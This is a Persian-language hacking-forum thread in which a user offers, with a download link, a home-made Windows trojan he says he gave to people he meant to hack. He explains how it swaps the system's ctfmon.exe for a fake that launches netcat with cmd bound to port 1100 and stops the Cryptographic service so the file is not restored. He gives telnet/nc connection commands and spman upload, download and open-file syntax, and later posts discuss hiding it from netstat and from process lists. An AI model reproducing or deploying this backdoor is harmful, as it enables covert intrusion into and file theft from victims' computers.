sp-remote file manager

[محمد حسینی]

(اگه نظر ندین بخاطر دو روزی که درس نخوندم خودکشی می کنم- حال نظر دادن ندارید نخونید که حلالتون نمی کنم!)
سلام رفقا!
پارسال همین موقع برای شروع سال سوم از ایرانویج خداحافظی کردم(برنامه ریزی بلند مدت بود برای کنکور). دیگه امسال پیش دانشگاهیم. مجبورم یه بار دیگه از ایرانویج خداحافظی کنم. هر چند تو این 7-8 روزی که بودم زیاد فعالیت نداشتم. می خوام جبران کنم. من عادت کردم هر دفعه خواستم از ایرانویج خداحافظی کنم یه چیزی به یادگار بزارم. چه خوشتون بیاد چه نیاد!
این چیزی که براتون آوردم یه سیستم کنترل فایل از راه دوره (با سورس) که خودم راه انداخته بودم و مخصوصه خودم بود. البته دیشب کلی تغییرات توش دادم. من همیشه وقتی قرار بود کسی ازم فایل بگیره (و قصد هک کردنش رو هم داشتم) بجای دادن تروجان و پس سندر ... اینو بهش می دادم. وقتی اجرا می کرد دیگه تموم بود. هر فایلی می خواست آپلود و دانلود می کردم(پی اس- ویروس).
این برنامه همون شل گرفتنه به اضافه دانلود و آپلود و باز کردن فایل ها(آهنگ-عکس-Exe ...) که خیلی مهمن. به نظر من که این کار از اف تی پی و برنامه های ریموت بهتره. با توجه به سرعت پایین اینترنت !
http://www.iranvig.com/4600.html
فایل extserv رو قربانی باید اجرا کنه. با اجرای اون پروسه ctfmon.exe بسته و بعد سرویس Cryptographic استاپ میشه. فایل ctfmon.exe از system32 پاک میشه و یه ctfmon.exe دیگه که تو ریسورس هست بجای اون میشینه. این ctfmon خودش از دوتا فایل تشکیل شده. یکیش همون ctfmon.exe اصلیه یکی دیگش هم nc . از این به بعد با شروع ویندوز فایل ctfmon.exe جعلی باز می شه که نتیجش باز شدن ctfmon اصلی و nc هست. nc هم که باز شد cmd رو پشت پورت 1100 میزاره و پورت آماده شل دادن میشه. Extserv یه فایل دیگه هم تو پوشه ویندوز کپی می کنه به اسم spman .
کاری که شما باید بکنید اینه که ip طرف رو گیر بیارید. برید تو cmd و شل بگیرید.
telnet IP 1100
همین الان کلی دسترسی به کامپیوتر طرف دارید. Copy-paste-rename-delete … و گشت و گزار
به غیر از آپلود و دانلود و باز کردن فایل ها. این سه تا رو باید spman انجام بده. اول باید فایل spman client رو روی کامپیوتر خودتون اجرا کنید. بعد تو شلی که گرفتین اینطوری بنویسین.
آپلود:
spman IP upload fulladdress
مثال: spman 127.0.0.1 upload d:\file.exe
دانلود:
spman IP download fulladdress
باز کردن فایل:
spman 0 openfile fulladdress
بجای IP باید آی پی خودتون رو بنویسین. بجای fulladdress هم آدرس کامل فایل روی کامپیوتر قربانی یا خودتون. در ضمن بعد از این که دستور رو کامل نوشتین (واینتر هم زدین) دستور exit هم بدین تا ارتیاط قطع بشه. در غیر اینصورت عمل نمی کنه! چراش رو خودمم هنوز نفهمیدم! (اگه کسی دلیلش رو می دونه لطف کنه بگه) بعدش می تونید دوباره کانکت بشید.
تو آدرس فایل و پوشه نباید فاصله باشه. اگه داشت قبلش rename کنید. با گیومه هم درست نمیشه ! (بزارید رو حساب برنامه نویسی ضعیف من). در مورد نوشتن دستورات شل هم بگم که نباید از بک اسپیس استفاده کنید (این مشکل دیگه از من نیست). هر جا اشتباه نوشتین اینتر بزنید و دوباره دستورو از اول بنویسین. هر وقت بعد از اینتر دستورتون پایین خط فرمان بدون ارور نوشته شد تمومه (البته + exit) .اگه از nc برای شل گرفتن استفاده کنید می تونید از بک اسپیس هم استفاده کنین. بجای تلنت : nc ip port . nc خیلی تمیزتره.
یه چیزایی هم از تو سورس پاک کردم که شلوغ نشه. یکسری تدابیر امنیتی برای جلوگیری از لو رفتن و زیر آب شدن سر nc که خودتون هرجور که دوست دارین کاملش کنید. سیستم ارسال ip هم از کار افتاده بود پاکش کردم! اینجاش دیگه همیشه باید بروز باشه. منم که بروز نیستم. مشکل فایروال رو هم قبلش باید خودتون حل کنید. تو همون فایل extserv باید اضافه کنید که در این زمینه هم چون بروز نبود تعطیل شد. درضمن با ران شدن سرویس Cryptographic فایل Ctfmon.exe درست نمیشه.(من تضمین می کنم.)

3-4 روزی برای دیدن نظراتتون هستم. هرکی هر نظری داره بگه. احتمالا بنظر خیلی از هکرای حرفه ای (server) خوش نیاد. ولی من که یه زمانی کلی با این حال میکردم.

*هک چیزی نیست جز تلف کردن زمان! هک = هدر دادن عمر* (شده مثل پیام اخلاقی رو بسته های سیگار!)

[Payman62]

سلام.
هنوز تست نکردم. ولی روش جالبیه. از این نظر که فایل حجیم نباشه میتونه مفید باشه. یه برنامه هم هست لینک سرور میدی بهش و قربانی که اجراش کنه میره سرور رو دانلود و اجرا میکنه. اونم مثل این روش جالبه.

سرویس Cryptographic رو هم که تو تاپیک بازسازی فایل ها گفتم مثلنکه خیلی به دردت خورده.

[محمد حسینی]

سلام.
یه برنامه هم هست لینک سرور میدی بهش و قربانی که اجراش کنه میره سرور رو دانلود و اجرا میکنه. اونم مثل این روش جالبه.

نکنه اون اکسپولیت 2-3 سال پیش رو می گی. اسمش یام نیست. ولی تا مدت ها بعد از پچ شدنش وب لاگا آموزشش رو می زاشتن(کپی میزدن دیگه). از اون موقع به بعد همچین چیزی ندیدم!
اگه غیر اینه لینکش رو بزار ببینیم چیه! کنجکاو شدم.

[avini]

حالا خودت رو ناراحت نکن ! NC.EXE نمیدونم کی بود ؟
اما این قضیه برای من پیش اومد !
نمیدونم کی بود
اما مشکلم رو با یک بکآپ قبلی از سیستمم رفعش کردم !
نمیدونم چیچی رو گزاشته بود تو استارت آپ

[Payman62]

سلام.
من سورس اون برنامه رو ندارم. وگرنه برات میذاشتم. ولی نوشتنش که کاری نداره. خیلی سادست. برنامه رو از لینک دانلود میکنه و اجرا میکنه. این که دیگه کنجکاوی نداره.

[محمد حسینی]

حالا خودت رو ناراحت نکن ! NC.EXE نمیدونم کی بود ؟
اما این قضیه برای من پیش اومد !
نمیدونم کی بود
اما مشکلم رو با یک بکآپ قبلی از سیستمم رفعش کردم !
نمیدونم چیچی رو گزاشته بود تو استارت آپ

ببینم تو همونی نیستی که رو کامپیوترت امنحانش کردم؟!
nc = netcat
تو استارت آپ هم چیزی نبود !
در ضمن من که گفتم تمام تدابیر امنیتی رو پاک کردم. اگه همونطوری بهت می دادم که به همین راحتیا کامپیوترت با بک آپ مثل روز اولش نمی شد. البته بستگی داره چه بک آپی گرفته باشی.

من سورس اون برنامه رو ندارم. وگرنه برات میذاشتم. ولی نوشتنش که کاری نداره. خیلی سادست. برنامه رو از لینک دانلود میکنه و اجرا میکنه. این که دیگه کنجکاوی نداره.

من با یه چیز دیگه اشتباه گرفتم. برا همین تعجب کردم. این که ...

کسی نظر دیگه ای نداره؟ این روزا ایرانویج روزی چندتا بازدید داره؟بخاطر شروع سال تحصیلی جدیده؟!

[محمد حسینی]

یکی دیگه از ویژگی های خوب این برنامه :
وقتی با nc پورت رو listen می کنیم دیگه با netstat تابلو نمیشه. در حالی که برنامه های remote دیگه با وین ساک کار می کنن و بدجوری تابلو می شن. اگه اون تدابیر امنیتی رو هم بر گردونیم (مثل hide process) دیگه لو نمیره! استارت آپ هم که نداره!

[avini]

[quote=spiderman]
[quote]
ببینم تو همونی نیستی که رو کامپیوترت امنحانش کردم؟!
nc = netcat
تو استارت آپ هم چیزی نبود !
در ضمن من که گفتم تمام تدابیر امنیتی رو پاک کردم. اگه همونطوری بهت می دادم که به همین راحتیا کامپیوترت با بک آپ مثل روز اولش نمی شد. البته بستگی داره چه بک آپی گرفته باشی.
[quote]
[/quote]

آها آره
NC رو که میدونم چیه
بک آپ من از تمام فایل های سیستمیمه با کله رجیستریه
وقتی از لینوکس برم راحت بک آپم رو برمیگردونم
یعنی همه فایل هارو با کل رجیستری رو Replace میکنم
همه فایل هارو

[avini]

راستی منم اینتر نت سکوریتیم رو خاموش کرده بودم
وگرنه به غیز ای یک سری آیپی که بهش دادم و یاهو هیچ آیپی نمیتونه به من کانکت بشه
حتی من خودم تا آیپی wwww.microsoft.com رو بهش ندم نمیتونم سایتش رو ببینم

[محمد حسینی]

NC رو که میدونم چیه

یادم باشه برای یاد گرفتنش مزاحمت بشم. من فقط 2-3 تا از دستوراش بلدم. البته اگه وقت داشته باشی!

بک آپ من از تمام فایل های سیستمیمه با کله رجیستریه
وقتی از لینوکس برم راحت بک آپم رو برمیگردونم
یعنی همه فایل هارو با کل رجیستری رو Replace میکنم
همه فایل هارو

تو هر یک ساعت یک ساعت از کل فایلات بک آپ می گیری یا هر دقیقه ! حالا چطوری می فهمی که سیستمت آلوده شده ؟! حتما تمام بک آپات آلوده! با این بک آپاپیشرفت سیستمت چطوره؟ برنامه هات با ویندوز می سازن؟! خیلی تو امنیت کارت درسته !
در ضمن مطمئن باش اگه من بخوام سیستمت رو آلوده کنم تو که هیچی گنده تر از توام به هیچی شک نمی کنه که بخواد بک آپ کنه.
ولی ماجرای بک آپ گرفتنت باید خیلی جالب باشه.

راستی منم اینتر نت سکوریتیم رو خاموش کرده بودم
وگرنه به غیز ای یک سری آیپی که بهش دادم و یاهو هیچ آیپی نمیتونه به من کانکت بشه
حتی من خودم تا آیپی wwww.microsoft.com رو بهش ندم نمیتونم سایتش رو ببینم

اینجا دیگه خیلی جالب شد ! من تا ته توی این اینترنت سکوریتیت رو در نیارم بی خیال نمی شم.
میشه بگی آی پی هایی که بهش دادی ماله کجاست؟! آی پیه چیه !؟ ! احتمالا یکیش باید آی پی سایت یاهو باشه !
راستی من شدیدا به آی پی مایکروسافت احتیاج دارم. حتما برام بفرستش. همون آی پی که کل سایت مایکروسافت باهاش باز میشه ! همون آی پی که همیشه جواب میده !

آخه من چرا باید با تو کل کل کنم ؟! ببینم تو چیکاره ای؟ تخصصت چیه؟ مثل من هیچی بارت نیست؟! البته تا اونجایی که من دیدم برای بخش آزاد خیلی زحمت می کشی. مخصوصا هر وقت بحث جوک میاد وسط.
چرا ایرانویج اینطوری شده ! بجای بحث روی برنامه ها و الگوریتم ها ...

[Payman62]

سلام.
اسپایدر چه قدر عصبانی هستی. صلوات بده.

ببینم فایل spman چطور به کلاینت وصل میشه؟ مگه با winsock وصل نمیشه که میگی پورتش تابلو نمیشه. روش کارت به این صورته که فقط هنگام دانلود و آپلود فایل ها پورت باز و بعدش هم بسته میشه؟

برای جلوگیری از بازسازی ctfmon چی؟ از همون روش که تو تاپیک بازسازی فایل ها گفتم استفاده کردی؟ یه کپی تو سیس32 یه کپی تو dllcache؟

یوزر قربانی باید حتما ادمین باشه تا برنامت بتونه کارشو انجام بده. البته با پارتیشن ntfs